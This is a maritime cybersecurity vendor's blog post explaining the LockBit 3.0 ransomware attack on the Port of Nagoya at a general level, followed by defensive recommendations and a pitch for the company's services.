Last Tuesday, the Port of Nagoya, Japan’s biggest maritime port, was crippled by an alleged Russian cyberattack, disrupting the port’s operation as containers could not be loaded or unloaded for several days. While there have been many cyber attacks targeting international ports in the past months (we counted no less than 34 ports targeted in less than a year), this one is considered a step up as it affected the operation of the port and not just its public website.
We wanted to take a minute to explain the details of the attacks and how to prevent them.
The recent attacks on port websites were usually in the form of Distributed Denial of Service (DDoS) attacks. That means that a net of compromised computers all try to access the website at once, creating an enormous spike in website traffic—to the point that information cannot be served anymore to clients. However, information is not stolen, and the attack can be mitigated using a DDoS prevention service such as Cloudflare. Such attacks tend to shut down access for a few hours at most.
However, the attack on the port of Nagoya was different. It was a ransomware attack that took over files necessary for the operation of the port, resulting in an actual halt to the port’s operation. The attack was attributed to the Russian-tied group “LockBit” and their cyber weapon, LockBit 3.0. LockBit is a sophisticated cyber weapon, and the LockBit group is a major player in cybercrime; it is believed to be accountable for over one-third of all recent ransomware attacks.
How does LockBit 3.0 work, and what can we do to prevent such attacks?
LockBit tools tend to penetrate the target network and systems by exploiting vulnerabilities in Remote Desktop (RDP) connectivity, using phishing campaigns (e.g., compromised attachments or links in emails), and exploiting known vulnerabilities in public-facing applications. Once the system is penetrated, it tends to use an open-source package known as “Chocolatey” to install and execute a “payload”—malicious code. LockBit 3.0 is more dangerous as it encrypts the payload code to avoid detection by anti-virus programs. After deploying the payload, it continues to map the compromised network (hostnames, network services, remote access protocols) and search for compromised passwords that are exposed in systems within the network (from inside) to gain elevated privileges and spread laterally within the network. It’s known to use Server Message Block (SMB), Group Policy Objects, and PsExec to spread its payload throughout the system. It may send back information to the attacker’s command and control server using Stealbit and clone together with public file-sharing services, and finally, it encrypts files on the network, deletes backups and logs, and posts a wallpaper with the demands.
Protection from such attacks should focus on the following:
- Continuous vulnerability scanning and patching
- Utilize maritime-specific Network Detection and Response tools to efficiently identify network traffic anomalies that are adapted to the specific systems used in your business
- Apply network segregation to minimize damage (for example, between crew and operations, IT and OT)
- Create regular off-network backups with a version history for fast recovery in case of a successful attack
To see a live example of a maritime cyber attack taking over a vessel’s navigation system, check out our recent webinar
Feel free to contact us to discuss how you can protect your business from such attacks. With Cydome maritime cyber security we can make the seas safer together!
